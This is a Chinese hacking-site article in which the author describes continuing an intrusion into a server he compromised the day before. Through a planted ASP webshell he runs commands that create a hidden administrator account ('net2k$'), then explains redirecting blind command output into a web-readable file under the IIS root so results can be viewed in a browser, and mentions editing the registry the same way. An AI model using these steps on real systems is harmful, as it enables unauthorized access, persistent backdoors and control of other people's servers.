作者: net2k 来源:
http://www.52chb.com/昨天黑的
服务器,由于疏忽,还有些文件未进行扫尾清理,今天打算上个后门开3389服务。轻车熟路,打开海洋asp
木马,把自己写好用来添加ID和开启服务的程序和准备好的开3389程序上传了上去,给我的结果是"0个文件上传",狂晕...差点没把我给气死...难道管理员有所察觉?但是我昨天上传的垃圾文件他不可能没发现呀?额头落一滴汗珠-----郁闷ing......这下我可是后悔得不得了,恨自己昨天没一口气黑到底,不停的叹气,不管它了,反正还能利用这匹马儿来为我出力-------姑且死马当活马医,碰碰运气吧:(,(因为asp
木马不是最高权限......)....在cmd命令框里输入:
------------------------------------------------------------
net user net2k$ 1234 /add //回车
net localgroup administrators net2k$ /add //回车
------------------------------------------------------------
这里遇到一个问题,由于不能回显,根本看不到帐户是否添加成功,
望着“不回显CMD命令”几个字,正长吁短叹之际,突然眼前一亮,想到了echo重定向命令,真是"山穷水尽疑无路,柳暗花明又一村"。关于这个echo命令,我这里在网上抄了一段例子说明下,新手如果不明白的可以去google搜索相关资料,这方面的资料是很多的~!
===============================================================================================
假设我们要把“南京大屠杀铁证如山,任何日本人不得抵赖!”写入index.htm,有2种方法,大家看看有什么区别。
-------------------------------------------------------
echo 南京大屠杀铁证如山,任何日本人不得抵赖!>index.htm
echo 南京大屠杀铁证如山,任何日本人不得抵赖!>>index.htm
-------------------------------------------------------
第一个的意思是覆盖index.htm原有的内容,把“南京大屠杀铁证如山,任何日本人不得抵赖!”写进index.htm。
第二个的意思是把“南京大屠杀铁证如山,任何日本人不得抵赖!”加到index.htm里面。
-------------------------------------------------------
“>>”产生的内容将追加进文件中,“>”则将原文件内容覆盖。
这里说明一下,<和>是重定向命令只是一个是输入重定向另一个是输出重定向,比如我们在命令提示符下就会显示c:\>这个
意思就是把C盘的命令权重定向给我们,同样:也是定向的命令也叫作管道,它是用来连接两个命令的管道,先执行管道左边
的命令,再执行管道右边的命令.
===============================================================================================
呵呵,懂echo原理的朋友就不必看了。其实这个方法的思路就是把命令的回显重定向到网站IIS目录的某个文件里,然后用IE访问它,IE里我门就可以间接看到命令的回显了。打个比方,网站IIS的物理路径是:
------------------------------------------------------------
D:\Inetpub\wwwroot\
------------------------------------------------------------
而在wwwroot\下又有很多站点,我们就把文件写入其中任意一个站点,请看命令:
------------------------------------------------------------
net user>D:\Inetpub\wwwroot\tty\chb.txt
------------------------------------------------------------
这样,我们就把net user的命令回显写进了一个tty的目录。那么我们又要如何察看这个文件呢?这也很简单,因为我黑这个
服务器是从一个网站渗头进入的,我echo文件也是写进这个网站的根目录的。所以我直
接在IE地址栏里写上这个网站地址再在地址的后面加chb.txt这个文件名就可以访问了。比如这个网站的地址是:
------------------------------------------------------------
http://www.x.net/
------------------------------------------------------------
我们就写:
------------------------------------------------------------
http://www.x.net/chb.txt
------------------------------------------------------------
当然,如果你echo文件时,不是把重定向写到这个网站的根目录,这样是根本访问不了的。呵呵,接下来的事情就是不停的执行你的命令,在IE这端不停按F5刷新就OK了。题外话,用这个命令我们还可以生成注册表文件,直接修改
服务器的注册表等等....反正是可以做很多事情的啦^_^!
设为首页
加入收藏
联系我们
您当前的位置:
减小字体
增大字体
